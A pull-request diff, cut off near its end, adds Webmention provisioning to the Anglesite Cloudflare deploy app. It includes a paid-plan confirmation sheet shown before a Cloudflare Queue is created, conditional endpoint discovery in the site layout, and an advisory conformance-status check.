### PR TITLE
feat(#359): webmention provisioning, discovery, conformance

### DIFF
--- a/Resources/Template/scripts/config.test.ts
+++ b/Resources/Template/scripts/config.test.ts
@@ -1,6 +1,6 @@
 import test from "node:test";
 import assert from "node:assert/strict";
-import { asBookingProvider, asDonationsProvider, asContactProvider } from "./config";
+import { asBookingProvider, asDonationsProvider, asContactProvider, readConfigFromString } from "./config";
 
 test("asBookingProvider: passes through recognized providers", () => {
   assert.equal(asBookingProvider("cal"), "cal");
@@ -34,4 +34,20 @@ test("asContactProvider: rejects unrecognized or empty values", () => {
   assert.equal(asContactProvider("typeform"), undefined);
   assert.equal(asContactProvider(""), undefined);
   assert.equal(asContactProvider(undefined), undefined);
+});
+
+// BaseLayout.astro gates `<link rel="webmention">` on this key (#359) — only advertise the
+// endpoint once SocialWorkerProvisionCommand has actually provisioned inbound receive.
+test("readConfigFromString: WEBMENTION_RECEIVE_ENABLED reads true when present", () => {
+  assert.equal(
+    readConfigFromString("SITE_URL=https://example.com\nWEBMENTION_RECEIVE_ENABLED=true", "WEBMENTION_RECEIVE_ENABLED"),
+    "true",
+  );
+});
+
+test("readConfigFromString: WEBMENTION_RECEIVE_ENABLED is undefined when absent", () => {
+  assert.equal(
+    readConfigFromString("SITE_URL=https://example.com", "WEBMENTION_RECEIVE_ENABLED"),
+    undefined,
+  );
 });

--- a/Resources/Template/src/layouts/BaseLayout.astro
+++ b/Resources/Template/src/layouts/BaseLayout.astro
@@ -1,6 +1,7 @@
 ---
 import "../styles/global.css";
 import Hcard from "../components/Hcard.astro";
+import { readConfig } from "../../scripts/config";
 // anglesite:imports — integration component imports are injected here on setup
 
 interface Props {
@@ -23,6 +24,9 @@ const { title, description } = Astro.props;
     <link rel="alternate" type="application/atom+xml" title="Atom" href="/atom.xml" />
     <link rel="alternate" type="application/feed+json" title="JSON Feed" href="/feed.json" />
     <link rel="indieauth-metadata" href="/.well-known/oauth-authorization-server" />
+    {readConfig("WEBMENTION_RECEIVE_ENABLED") === "true" && (
+      <link rel="webmention" href="/webmention" />
+    )}
     <slot name="head" />
     <!-- anglesite:head-end -->
   </head>

--- a/Sources/AnglesiteApp/CompletionNotificationHub.swift
+++ b/Sources/AnglesiteApp/CompletionNotificationHub.swift
@@ -61,6 +61,11 @@ enum CompletionNotificationHub {
                 // deploy is parked rather than finished — no completion notice, just stop
                 // showing progress on the Dock tile.
                 DockProgressController.shared.clear(token: dockToken)
+            case .webmentionPaidPlanConfirmationNeeded:
+                // Same reasoning as `.workerNameConflict` — the confirmation sheet (wired
+                // separately) carries the actionable info, and the deploy is parked rather than
+                // finished.
+                DockProgressController.shared.clear(token: dockToken)
             }
         }
         deploy.onMilestone = { siteID, progress in

--- a/Sources/AnglesiteApp/DeployDrawerView.swift
+++ b/Sources/AnglesiteApp/DeployDrawerView.swift
@@ -9,9 +9,9 @@ import AnglesiteCore
 ///   - `.succeeded` → deployed URL with Copy / Open buttons + log
 ///   - `.failed`   → reason banner + log + Copy-log
 ///
-/// The `.blocked` and `.workerNameConflict` phases are each rendered by their own modal sheet,
-/// not here — by the time this drawer is on screen, the deploy has either reached wrangler or
-/// failed in a way the user might want to read about.
+/// The `.blocked`, `.workerNameConflict`, and `.webmentionPaidPlanConfirmationNeeded` phases are
+/// each rendered by their own modal sheet, not here — by the time this drawer is on screen, the
+/// deploy has either reached wrangler or failed in a way the user might want to read about.
 struct DeployDrawerView: View {
     @Bindable var model: DeployModel
     let siteName: String
@@ -87,7 +87,7 @@ struct DeployDrawerView: View {
             Image(systemName: "exclamationmark.octagon.fill")
                 .foregroundStyle(.red).font(.title3)
                 .accessibilityHidden(true)
-        case .idle, .blocked, .workerNameConflict:
+        case .idle, .blocked, .workerNameConflict, .webmentionPaidPlanConfirmationNeeded:
             Image(systemName: "shippingbox").font(.title3)
                 .accessibilityHidden(true)
         }
@@ -98,7 +98,7 @@ struct DeployDrawerView: View {
         case .running: return "Deploying \(siteName)…"
         case .succeeded(let url, _): return url.absoluteString
         case .failed: return "Deploy failed"
-        case .idle, .blocked, .workerNameConflict: return siteName
+        case .idle, .blocked, .workerNameConflict, .webmentionPaidPlanConfirmationNeeded: return siteName
         }
     }
 
@@ -225,7 +225,7 @@ struct DeployDrawerView: View {
         case .succeeded(let url, _): return .succeeded(url: url.absoluteString)
         case .failed(let reason, let exit):
             return .failed(reason: exit.map { "\(reason) (exit \($0))" } ?? reason)
-        case .idle, .blocked, .workerNameConflict: return .inactive
+        case .idle, .blocked, .workerNameConflict, .webmentionPaidPlanConfirmationNeeded: return .inactive
         }
     }
 

--- a/Sources/AnglesiteApp/DeployModel.swift
+++ b/Sources/AnglesiteApp/DeployModel.swift
@@ -493,6 +493,18 @@ final class DeployModel {
             await logCenter.append(source: "deploy:\(siteID)", stream: .stderr, text: warning)
         }
 
+        // Advisory-only (#359): surfaces @dwk/workers conformance status for the active set's
+        // gated phase, if any. Never blocks — a fetch failure degrades to an empty status inside
+        // WorkersConformanceFetcher, and conformanceAdvisory returning nil just skips the log.
+        let conformanceStatus = await WorkersConformanceFetcher(
+            statusURL: WorkersConformanceFetcher.productionStatusURL
+        ).status()
+        if let advisory = WorkerActivation.conformanceAdvisory(
+            activeIDs: effectiveActiveIDs, conformance: conformanceStatus
+        ) {
+            await logCenter.append(source: "deploy:\(siteID)", stream: .stdout, text: advisory)
+        }
+
         // Dynamic-route claims of the effective active set (#746). Validation failures (a
         // malformed path, two active workers claiming overlapping routes) refuse the deploy
         // before any Cloudflare call — never silently drop a claim and deploy a Worker whose

--- a/Sources/AnglesiteApp/DeployModel.swift
+++ b/Sources/AnglesiteApp/DeployModel.swift
@@ -496,8 +496,14 @@ final class DeployModel {
         // Advisory-only (#359): surfaces @dwk/workers conformance status for the active set's
         // gated phase, if any. Never blocks — a fetch failure degrades to an empty status inside
         // WorkersConformanceFetcher, and conformanceAdvisory returning nil just skips the log.
+        // Bounded to a short request timeout (rather than URLSession.shared's ~60s default) so
+        // an unreachable raw.githubusercontent.com (offline dev, corporate firewall) can't add
+        // meaningful latency to every deploy before falling back to cache/empty.
+        let conformanceSessionConfig = URLSessionConfiguration.default
+        conformanceSessionConfig.timeoutIntervalForRequest = 5
         let conformanceStatus = await WorkersConformanceFetcher(
-            statusURL: WorkersConformanceFetcher.productionStatusURL
+            statusURL: WorkersConformanceFetcher.productionStatusURL,
+            session: URLSession(configuration: conformanceSessionConfig)
         ).status()
         if let advisory = WorkerActivation.conformanceAdvisory(
             activeIDs: effectiveActiveIDs, conformance: conformanceStatus

--- a/Sources/AnglesiteApp/DeployModel.swift
+++ b/Sources/AnglesiteApp/DeployModel.swift
@@ -25,6 +25,7 @@ final class DeployModel {
         case failed(reason: String, exitCode: Int32?)
         case blocked(failures: [PreDeployCheck.ScanFailure], warnings: [PreDeployCheck.ScanWarning])
         case workerNameConflict(name: String)
+        case webmentionPaidPlanConfirmationNeeded
     }
 
     private(set) var phase: Phase = .idle
@@ -59,6 +60,11 @@ final class DeployModel {
     /// Set when a rename attempt itself fails (invalid name, or no parked deploy). Cleared on
     /// every fresh presentation and on a successful rename-and-retry.
     private(set) var workerNameConflictError: String?
+    /// Bound to a `.sheet` in `SiteWindow` for the `.webmentionPaidPlanConfirmationNeeded`
+    /// outcome — inbound Webmention needs a Cloudflare Queue, which requires the Workers Paid
+    /// plan. Reuses `pendingDeploy` to park and retry, same as the token-prompt and
+    /// worker-name-conflict flows.
+    var webmentionPaidPlanConfirmationPresented: Bool = false
 
     /// Progress of verifying a pasted token, consumed by `CloudflareTokenPromptView`'s status line
     /// and button-enabled logic. A token is only written to the Keychain once verification reaches
@@ -345,6 +351,31 @@ final class DeployModel {
         workerNameConflictError = nil
     }
 
+    /// Called by the paid-plan confirmation sheet's "Enable & retry" button. Persists the
+    /// acknowledgment into `SiteSettings` (so future deploys never re-prompt) and retries the
+    /// parked deploy — `runDeploy` re-reads settings and passes `acknowledgesPaidPlan: true`
+    /// into `SocialWorkerProvisionCommand.provision`, which then creates the Queue.
+    func acknowledgeWebmentionPaidPlanAndRetry() async {
+        guard let pending = pendingDeploy else { return }
+        let configStore = SiteConfigStore(configDirectory: pending.configDirectory)
+        var settings = (try? await configStore.load()) ?? SiteSettings()
+        settings.webmentionReceivePaidPlanAcknowledged = true
+        try? await configStore.save(settings)
+        pendingDeploy = nil
+        // Deliberately NOT clearing webmentionPaidPlanConfirmationPresented here — mirrors
+        // renameWorkerAndRetry's identical reasoning: the sheet stays open while the retried
+        // deploy runs, and runDeploy's terminal cases dismiss it once the outcome is known.
+        deploy(
+            siteID: pending.siteID, siteDirectory: pending.siteDirectory,
+            configDirectory: pending.configDirectory, currentRoutes: pending.currentRoutes,
+            containerControlProvider: pending.containerControlProvider, siteName: pending.siteName)
+    }
+
+    func cancelWebmentionPaidPlanConfirmation() {
+        pendingDeploy = nil
+        webmentionPaidPlanConfirmationPresented = false
+    }
+
     func dismissDrawer() {
         drawerPresented = false
     }
@@ -476,6 +507,7 @@ final class DeployModel {
             _ = await logTask.value
             currentMilestone = nil
             workerNameConflictPresented = false
+            webmentionPaidPlanConfirmationPresented = false
             transition(siteID: siteID, to: .failed(reason: reason, exitCode: nil))
             return .failed(reason: reason, exitCode: nil)
         }
@@ -509,14 +541,32 @@ final class DeployModel {
         let workerSiteName = DeployCoordinator.resolveWorkerSiteName(
             siteDirectory: siteDirectory, siteID: siteID, siteName: siteName
         )
+        let siteURL = DeployCoordinator.resolveSiteURL(siteDirectory: siteDirectory)
+        let acknowledgesPaidPlan = settings.webmentionReceivePaidPlanAcknowledged ?? false
         let provisionResult = await socialCommand.provision(
             siteID: siteID,
             siteDirectory: siteDirectory,
             siteName: workerSiteName,
             workers: workers,
             routeClaims: routeClaims.map(\.claim),
-            knownResources: settings.provisionedWorkerResources ?? .init()
+            knownResources: settings.provisionedWorkerResources ?? .init(),
+            siteURL: siteURL,
+            acknowledgesPaidPlan: acknowledgesPaidPlan
         )
+
+        if case .webmentionPaidPlanConfirmationNeeded = provisionResult {
+            pendingDeploy = (siteID, siteDirectory, configDirectory, currentRoutes, containerControlProvider, siteName)
+            subscription.cancel()
+            _ = await logTask.value
+            currentMilestone = nil
+            workerNameConflictPresented = false
+            transition(siteID: siteID, to: .webmentionPaidPlanConfirmationNeeded)
+            drawerPresented = false
+            webmentionPaidPlanConfirmationPresented = presentation == .foreground
+            return .failed(
+                reason: "Inbound Webmention requires the Cloudflare Workers Paid plan — confirm to continue",
+                exitCode: nil)
+        }
 
         if case .succeeded(_, let resources, _) = provisionResult {
             await DeployCoordinator.persistProvisionedResources(
@@ -555,12 +605,14 @@ final class DeployModel {
             )
             currentMilestone = nil
             workerNameConflictPresented = false
+            webmentionPaidPlanConfirmationPresented = false
             if let settings = try? await SiteConfigStore(configDirectory: configDirectory).load() {
                 sourceBundleStatus = await SourceBundleStatus.check(siteDirectory: siteDirectory, settings: settings)
             }
             transition(siteID: siteID, to: .succeeded(url: url, duration: duration))
         case .failed(let reason, let exit):
             workerNameConflictPresented = false
+            webmentionPaidPlanConfirmationPresented = false
             transition(siteID: siteID, to: .failed(reason: reason, exitCode: exit))
             guard presentation == .foreground else { return result }
             let capturedLog = logText   // snapshot before the suspension; a later deploy clears logLines
@@ -582,6 +634,7 @@ final class DeployModel {
             // streaming-log drawer would just be noise.
             drawerPresented = false
             workerNameConflictPresented = false
+            webmentionPaidPlanConfirmationPresented = false
             blockedPresented = presentation == .foreground
         case .workerNameConflict(let name):
             // Parks the provider, not the resolved `containerControl` snapshot above — the
@@ -591,6 +644,7 @@ final class DeployModel {
             drawerPresented = false
             workerNameConflictError = nil
             workerNameConflictPresented = presentation == .foreground
+            webmentionPaidPlanConfirmationPresented = false
         }
         return result
     }

--- a/Sources/AnglesiteApp/Localizable.xcstrings
+++ b/Sources/AnglesiteApp/Localizable.xcstrings
@@ -931,6 +931,9 @@
     "Enable" : {
 
     },
+    "Enable & retry" : {
+
+    },
     "Enable Onion Routing" : {
 
     },
@@ -1187,6 +1190,9 @@
 
     },
     "Impact analysis" : {
+
+    },
+    "Inbound Webmention requires the Workers Paid plan" : {
 
     },
     "Import Site…" : {
@@ -1670,6 +1676,9 @@
 
     },
     "Reading %@ zone settings from Cloudflare…" : {
+
+    },
+    "Receiving webmentions verifies each one asynchronously using a Cloudflare Queue, which isn't available on the Workers Free plan. Continuing will create a Queue on your connected Cloudflare account." : {
 
     },
     "Recheck" : {

--- a/Sources/AnglesiteApp/SiteWindow.swift
+++ b/Sources/AnglesiteApp/SiteWindow.swift
@@ -524,6 +524,11 @@ struct SiteWindow: View {
                 }
             }
         }
+        .sheet(isPresented: $bindableModel.deploy.webmentionPaidPlanConfirmationPresented) {
+            WebmentionPaidPlanConfirmationSheetView(model: model.deploy) {
+                model.deploy.cancelWebmentionPaidPlanConfirmation()
+            }
+        }
         .sheet(isPresented: $bindableModel.audit.sheetPresented) {
             AuditSheetView(
                 model: model.audit,

--- a/Sources/AnglesiteApp/WebmentionPaidPlanConfirmationSheetView.swift
+++ b/Sources/AnglesiteApp/WebmentionPaidPlanConfirmationSheetView.swift
@@ -1,0 +1,41 @@
+import SwiftUI
+import AnglesiteCore
+
+/// Sheet shown when a deploy needs to provision the Cloudflare Queue that inbound Webmention's
+/// async verification step relies on — Queues require the Workers **Paid** plan, so the app
+/// asks for an explicit one-time acknowledgment before ever calling `wrangler queues create`
+/// (#359). Mirrors `WorkerNameConflictSheetView`'s park-and-retry shape.
+struct WebmentionPaidPlanConfirmationSheetView: View {
+    let model: DeployModel
+    let onCancel: () -> Void
+
+    var body: some View {
+        VStack(alignment: .leading, spacing: 16) {
+            VStack(alignment: .leading, spacing: 4) {
+                Text("Inbound Webmention requires the Workers Paid plan")
+                    .font(.headline)
+                Text("Receiving webmentions verifies each one asynchronously using a Cloudflare Queue, which isn't available on the Workers Free plan. Continuing will create a Queue on your connected Cloudflare account.")
+                    .font(.callout)
+                    .foregroundStyle(.secondary)
+                    .fixedSize(horizontal: false, vertical: true)
+            }
+
+            HStack {
+                Spacer()
+                Button("Cancel") { onCancel() }
+                    .keyboardShortcut(.cancelAction)
+                Button("Enable & retry") {
+                    Task { await model.acknowledgeWebmentionPaidPlanAndRetry() }
+                }
+                .keyboardShortcut(.defaultAction)
+                .buttonStyle(.borderedProminent)
+            }
+        }
+        .padding(20)
+        .frame(width: 460)
+    }
+}
+
+#Preview {
+    WebmentionPaidPlanConfirmationSheetView(model: DeployModel(), onCancel: {})
+}

--- a/Sources/AnglesiteCore/DeployCoordinator.swift
+++ b/Sources/AnglesiteCore/DeployCoordinator.swift
@@ -91,6 +91,22 @@ public enum DeployCoordinator {
             ?? SiteSlug.derive(from: siteName ?? siteID)
     }
 
+    /// The site's best-known public URL for `WorkerComposition`'s `SITE_URL` var (#359): a
+    /// custom domain (`DOMAIN`/`SITE_DOMAIN`, `WebsiteAnalyticsAsset.bestHost`'s own precedence)
+    /// wins, given a scheme since those keys store a bare host; otherwise the workers.dev host
+    /// `DeployCommand.persistSiteURL` writes after the site's first successful deploy. `nil`
+    /// before any deploy has ever run and no custom domain is configured — the composed Worker
+    /// degrades gracefully without it (worker.ts's queue consumer no-ops).
+    public static func resolveSiteURL(siteDirectory: URL) -> String? {
+        let config = (try? WebsiteAnalyticsAsset.loadConfig(siteDirectory: siteDirectory)) ?? ""
+        if let domain = WebsiteAnalyticsAsset.configValue("DOMAIN", in: config)
+            ?? WebsiteAnalyticsAsset.configValue("SITE_DOMAIN", in: config) {
+            let trimmed = domain.trimmingCharacters(in: .whitespacesAndNewlines)
+            return trimmed.isEmpty ? nil : "https://\(trimmed)"
+        }
+        return WebsiteAnalyticsAsset.configValue("SITE_URL", in: config)
+    }
+
     /// Persists the newly-provisioned Cloudflare resources and advances the `lastDeployedWorkerIDs`
     /// baseline to `effectiveActiveIDs` (#709) after a successful provision — the diff baseline
     /// `WorkerActivation.removedIDs` compares the *next* deploy's plan against. Best-effort, like

--- a/Sources/AnglesiteCore/SiteConfigStore.swift
+++ b/Sources/AnglesiteCore/SiteConfigStore.swift
@@ -55,6 +55,12 @@ public struct SiteSettings: Sendable, Codable, Equatable {
     /// re-scraping the file (#709).
     public var provisionedWorkerResources: WorkerComposition.ProvisionedResources?
 
+    /// Explicit opt-in: the user has acknowledged that enabling inbound Webmention requires the
+    /// Cloudflare Workers **Paid** plan (Cloudflare Queues aren't available on Free). `nil`/`false`
+    /// means `SocialWorkerProvisionCommand.provision` must not attempt to create the Queue —
+    /// see `DeployModel.webmentionPaidPlanConfirmationPresented`.
+    public var webmentionReceivePaidPlanAcknowledged: Bool?
+
     public init(
         displayName: String? = nil,
         inboxCaptureAccountID: String? = nil,
@@ -65,7 +71,8 @@ public struct SiteSettings: Sendable, Codable, Equatable {
         deployedSourceBundleCommit: String? = nil,
         activeWorkerIDs: [String]? = nil,
         lastDeployedWorkerIDs: [String]? = nil,
-        provisionedWorkerResources: WorkerComposition.ProvisionedResources? = nil
+        provisionedWorkerResources: WorkerComposition.ProvisionedResources? = nil,
+        webmentionReceivePaidPlanAcknowledged: Bool? = nil
     ) {
         self.displayName = displayName
         self.inboxCaptureAccountID = inboxCaptureAccountID
@@ -77,6 +84,7 @@ public struct SiteSettings: Sendable, Codable, Equatable {
         self.activeWorkerIDs = activeWorkerIDs
         self.lastDeployedWorkerIDs = lastDeployedWorkerIDs
         self.provisionedWorkerResources = provisionedWorkerResources
+        self.webmentionReceivePaidPlanAcknowledged = webmentionReceivePaidPlanAcknowledged
     }
 }
 

--- a/Sources/AnglesiteCore/SiteOperations.swift
+++ b/Sources/AnglesiteCore/SiteOperations.swift
@@ -243,6 +243,8 @@ public struct SiteOperations: Sendable {
             return "Social Worker provisioning blocked by the pre-deploy security scan (\(count) \(noun)).\(resourceSuffix(resources))"
         case .workerNameConflict(let name, let resources):
             return "Social Worker provisioning blocked: the Worker name \"\(name)\" is already in use on your Cloudflare account. Rename the site's Worker in Anglesite and try again.\(resourceSuffix(resources))"
+        case .webmentionPaidPlanConfirmationNeeded(let resources):
+            return "Social Worker provisioning paused: inbound Webmention requires the Cloudflare Workers Paid plan. Confirm this in Anglesite's deploy sheet and try again.\(resourceSuffix(resources))"
         case .failed(let reason, _, let resources):
             return "Social Worker provisioning failed: \(reason).\(resourceSuffix(resources))"
         }

--- a/Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift
+++ b/Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift
@@ -18,8 +18,10 @@ public actor SocialWorkerProvisionCommand {
         /// rather than collapsing it, so callers can drive the same rename-and-retry UX (#740).
         case workerNameConflict(name: String, resources: WorkerComposition.ProvisionedResources)
         /// Webmention receive is active but the site hasn't explicitly acknowledged that
-        /// Cloudflare Queues require the Workers Paid plan (#359). Returned *before* any
-        /// wrangler call — `DeployModel` parks the deploy and presents a confirmation sheet;
+        /// Cloudflare Queues require the Workers Paid plan (#359). Returned *before any wrangler
+        /// call for the Queue* — earlier D1/KV/R2 wrangler calls (and their `persistConfig`
+        /// writes) may already have run in this same `provision()` invocation before this gate
+        /// is reached. `DeployModel` parks the deploy and presents a confirmation sheet;
         /// retrying with `acknowledgesPaidPlan: true` proceeds to create the Queue.
         case webmentionPaidPlanConfirmationNeeded(resources: WorkerComposition.ProvisionedResources)
         case failed(reason: String, exitCode: Int32?, resources: WorkerComposition.ProvisionedResources)
@@ -290,14 +292,22 @@ public actor SocialWorkerProvisionCommand {
                 atomically: true,
                 encoding: .utf8
             )
+            // Reflects "the receiver is actually live" (webmention worker active AND its Queue
+            // exists), not just "webmention worker is in the active set" — and is written
+            // unconditionally on every call (not gated behind `if hasWebmentionReceive`), so a
+            // redeploy always reconciles it to the current true state, the same way the
+            // D1/KV/R2/Queue TOML blocks above are always regenerated fresh. Without this, a
+            // site that later deactivates webmention would keep advertising
+            // `<link rel="webmention">` at an endpoint the Worker no longer serves.
             let hasWebmentionReceive = workers.contains(where: { $0.id == WorkerComposition.webmentionWorkerID })
-            if hasWebmentionReceive {
-                let configURL = siteDirectory.appendingPathComponent(".site-config")
-                let existing = (try? String(contentsOf: configURL, encoding: .utf8)) ?? ""
-                let updated = SiteConfigFile.upsert([("WEBMENTION_RECEIVE_ENABLED", "true")], into: existing)
-                if updated != existing {
-                    try updated.write(to: configURL, atomically: true, encoding: .utf8)
-                }
+            let webmentionReceiveEnabled = hasWebmentionReceive && resources.queueName != nil
+            let configURL = siteDirectory.appendingPathComponent(".site-config")
+            let existing = (try? String(contentsOf: configURL, encoding: .utf8)) ?? ""
+            let updated = SiteConfigFile.upsert(
+                [("WEBMENTION_RECEIVE_ENABLED", webmentionReceiveEnabled ? "true" : "false")], into: existing
+            )
+            if updated != existing {
+                try updated.write(to: configURL, atomically: true, encoding: .utf8)
             }
             return nil
         } catch {

--- a/Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift
+++ b/Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift
@@ -17,6 +17,11 @@ public actor SocialWorkerProvisionCommand {
         /// this site has never deployed before — mirrors `DeployCommand.Result.workerNameConflict`
         /// rather than collapsing it, so callers can drive the same rename-and-retry UX (#740).
         case workerNameConflict(name: String, resources: WorkerComposition.ProvisionedResources)
+        /// Webmention receive is active but the site hasn't explicitly acknowledged that
+        /// Cloudflare Queues require the Workers Paid plan (#359). Returned *before* any
+        /// wrangler call — `DeployModel` parks the deploy and presents a confirmation sheet;
+        /// retrying with `acknowledgesPaidPlan: true` proceeds to create the Queue.
+        case webmentionPaidPlanConfirmationNeeded(resources: WorkerComposition.ProvisionedResources)
         case failed(reason: String, exitCode: Int32?, resources: WorkerComposition.ProvisionedResources)
     }
 
@@ -61,7 +66,17 @@ public actor SocialWorkerProvisionCommand {
         /// a worker being deactivated (which drops its binding block from the file) and later
         /// reactivated — the default (`.init()`, all-nil) makes this call fall through to the
         /// existing file-scrape-only behavior unchanged.
-        knownResources: WorkerComposition.ProvisionedResources = .init()
+        knownResources: WorkerComposition.ProvisionedResources = .init(),
+        /// The site's best-known public URL (`.site-config`'s `DOMAIN`/`SITE_DOMAIN`/`SITE_URL`,
+        /// via `DeployCoordinator.resolveSiteURL`), threaded into `WorkerComposition`'s `SITE_URL`
+        /// var. `nil` on a first-ever deploy before any host is known — the composed Worker
+        /// degrades gracefully (worker.ts no-ops the queue consumer without it).
+        siteURL: String? = nil,
+        /// Explicit per-deploy opt-in that the user has acknowledged inbound Webmention requires
+        /// the Cloudflare Workers Paid plan (#359) — `DeployModel` sets this from
+        /// `SiteSettings.webmentionReceivePaidPlanAcknowledged` plus the in-flight confirmation
+        /// sheet's "Enable & retry" action. Ignored unless a `webmention` worker is active.
+        acknowledgesPaidPlan: Bool = false
     ) async -> Result {
         let token: String?
         do {
@@ -109,7 +124,7 @@ public actor SocialWorkerProvisionCommand {
                     return .failed(reason: "wrangler created D1 database \(name) but no database id was found", exitCode: 0, resources: resources)
                 }
                 resources.d1DatabaseID = id
-                if let failure = persistConfig(siteDirectory: siteDirectory, siteName: siteName, workers: workers, routeClaims: routeClaims, resources: resources) {
+                if let failure = persistConfig(siteDirectory: siteDirectory, siteName: siteName, workers: workers, routeClaims: routeClaims, resources: resources, siteURL: siteURL) {
                     return failure
                 }
             }
@@ -136,7 +151,7 @@ public actor SocialWorkerProvisionCommand {
                     return .failed(reason: "wrangler created KV namespace \(name) but no namespace id was found", exitCode: 0, resources: resources)
                 }
                 resources.kvNamespaceID = id
-                if let failure = persistConfig(siteDirectory: siteDirectory, siteName: siteName, workers: workers, routeClaims: routeClaims, resources: resources) {
+                if let failure = persistConfig(siteDirectory: siteDirectory, siteName: siteName, workers: workers, routeClaims: routeClaims, resources: resources, siteURL: siteURL) {
                     return failure
                 }
             }
@@ -156,13 +171,40 @@ public actor SocialWorkerProvisionCommand {
                     return failure
                 }
                 resources.r2BucketName = name
-                if let failure = persistConfig(siteDirectory: siteDirectory, siteName: siteName, workers: workers, routeClaims: routeClaims, resources: resources) {
+                if let failure = persistConfig(siteDirectory: siteDirectory, siteName: siteName, workers: workers, routeClaims: routeClaims, resources: resources, siteURL: siteURL) {
                     return failure
                 }
             }
         }
 
-        if let failure = persistConfig(siteDirectory: siteDirectory, siteName: siteName, workers: workers, routeClaims: routeClaims, resources: resources) {
+        let hasWebmentionReceive = workers.contains(where: { $0.id == WorkerComposition.webmentionWorkerID })
+        if hasWebmentionReceive, resources.queueName == nil {
+            guard acknowledgesPaidPlan else {
+                return .webmentionPaidPlanConfirmationNeeded(resources: resources)
+            }
+            let name = "\(siteName)-webmention"
+            let result = await runWrangler(
+                siteDirectory: siteDirectory,
+                arguments: ["queues", "create", name, "--json"],
+                environment: environment,
+                source: source,
+                resources: resources
+            )
+            switch result {
+            case .success:
+                resources.queueName = name
+            case .failure(let failure):
+                return failure
+            }
+            if let failure = persistConfig(
+                siteDirectory: siteDirectory, siteName: siteName, workers: workers,
+                routeClaims: routeClaims, resources: resources, siteURL: siteURL
+            ) {
+                return failure
+            }
+        }
+
+        if let failure = persistConfig(siteDirectory: siteDirectory, siteName: siteName, workers: workers, routeClaims: routeClaims, resources: resources, siteURL: siteURL) {
             return failure
         }
 
@@ -227,7 +269,8 @@ public actor SocialWorkerProvisionCommand {
         siteName: String,
         workers: [WorkerDescriptor],
         routeClaims: [WorkerRouteClaim],
-        resources: WorkerComposition.ProvisionedResources
+        resources: WorkerComposition.ProvisionedResources,
+        siteURL: String? = nil
     ) -> Result? {
         do {
             // Called without `inboxCaptureEnabled`/`inboxKVNamespaceID` — #587's inbox-capture
@@ -239,7 +282,8 @@ public actor SocialWorkerProvisionCommand {
                 siteName: siteName,
                 workers: workers,
                 routeClaims: routeClaims,
-                resources: resources
+                resources: resources,
+                siteURL: siteURL
             )
             try toml.write(
                 to: siteDirectory.appendingPathComponent("wrangler.toml"),
@@ -260,7 +304,8 @@ public actor SocialWorkerProvisionCommand {
         return .init(
             d1DatabaseID: extractTomlString(named: "database_id", from: toml),
             kvNamespaceID: extractTomlString(named: "id", from: toml),
-            r2BucketName: extractTomlString(named: "bucket_name", from: toml)
+            r2BucketName: extractTomlString(named: "bucket_name", from: toml),
+            queueName: extractTomlString(named: "queue", from: toml)
         )
     }
 
@@ -340,6 +385,14 @@ extension SocialWorkerProvisionCommand.Result {
             return .blocked(failures: failures, warnings: warnings)
         case .workerNameConflict(let name, _):
             return .workerNameConflict(name: name)
+        case .webmentionPaidPlanConfirmationNeeded:
+            // `DeployCommand.Result` has no equivalent case yet — callers that go through this
+            // convenience mapping (rather than reading `SocialWorkerProvisionCommand.Result`
+            // directly) see this as a plain failure until the confirmation-sheet wiring lands.
+            return .failed(
+                reason: "Inbound Webmention requires the Cloudflare Workers Paid plan — confirm in Settings before deploying",
+                exitCode: nil
+            )
         case .failed(let reason, let exitCode, _):
             return .failed(reason: reason, exitCode: exitCode)
         }

--- a/Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift
+++ b/Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift
@@ -290,6 +290,15 @@ public actor SocialWorkerProvisionCommand {
                 atomically: true,
                 encoding: .utf8
             )
+            let hasWebmentionReceive = workers.contains(where: { $0.id == WorkerComposition.webmentionWorkerID })
+            if hasWebmentionReceive {
+                let configURL = siteDirectory.appendingPathComponent(".site-config")
+                let existing = (try? String(contentsOf: configURL, encoding: .utf8)) ?? ""
+                let updated = SiteConfigFile.upsert([("WEBMENTION_RECEIVE_ENABLED", "true")], into: existing)
+                if updated != existing {
+                    try updated.write(to: configURL, atomically: true, encoding: .utf8)
+                }
+            }
             return nil
         } catch {
             return .failed(reason: "couldn't write wrangler.toml: \(error)", exitCode: nil, resources: resources)

--- a/Sources/AnglesiteCore/WorkerActivation.swift
+++ b/Sources/AnglesiteCore/WorkerActivation.swift
@@ -80,4 +80,28 @@ public enum WorkerActivation {
         guard !unresolvedIDs.isEmpty else { return nil }
         return "no catalog entry for active worker(s) \(unresolvedIDs.sorted().joined(separator: ", ")) — deploying with no resource bindings or route claims for them; wrangler.toml composition will be incomplete until a catalog fetch resolves them"
     }
+
+    /// Advisory-only (#359): reports which required `@dwk/*` packages for an active worker's
+    /// gated phase aren't release-ready yet, per `WorkersConformanceStatus.gateStatus`. Never
+    /// blocks activation or deploy — `conformance/status.json` reporting a package `"pending"`
+    /// is expected during active development (verified live 2026-07-21: V-3's packages are all
+    /// `"pending"` even though #887's webmention receiver already ships and works). This exists
+    /// purely so the debug pane surfaces "you're running ahead of conformance certification"
+    /// rather than the app silently having no opinion. `nil` when nothing to report.
+    public static func conformanceAdvisory(
+        activeIDs: Set<String>, conformance: WorkersConformanceStatus
+    ) -> String? {
+        var messages: [String] = []
+        for phase in [WorkersConformanceStatus.Phase.v2, .v3, .v4] {
+            let required = WorkersConformanceStatus.phaseRequirements[phase] ?? []
+            // Only advise about a phase if one of its required packages corresponds to an
+            // active worker id — npm package names are "@dwk/<id>", matching WorkerDescriptor.id.
+            let relevantActive = required.contains { activeIDs.contains(String($0.dropFirst("@dwk/".count))) }
+            guard relevantActive else { continue }
+            let gate = conformance.gateStatus(for: phase)
+            guard !gate.isUnblocked else { continue }
+            messages.append("conformance: \(gate.blocked.joined(separator: ", ")) not yet release-ready for this phase")
+        }
+        return messages.isEmpty ? nil : messages.joined(separator: "; ")
+    }
 }

--- a/Sources/AnglesiteCore/WorkerComposition.swift
+++ b/Sources/AnglesiteCore/WorkerComposition.swift
@@ -49,11 +49,19 @@ public enum WorkerComposition {
         public var d1DatabaseID: String?
         public var kvNamespaceID: String?
         public var r2BucketName: String?
+        /// The Cloudflare Queue name backing `@dwk/webmention`'s async verify step. Like
+        /// `r2BucketName`, this is a deterministic name (`\(siteName)-webmention`), not an id —
+        /// wrangler.toml's `[[queues.*]]` blocks reference queues by name.
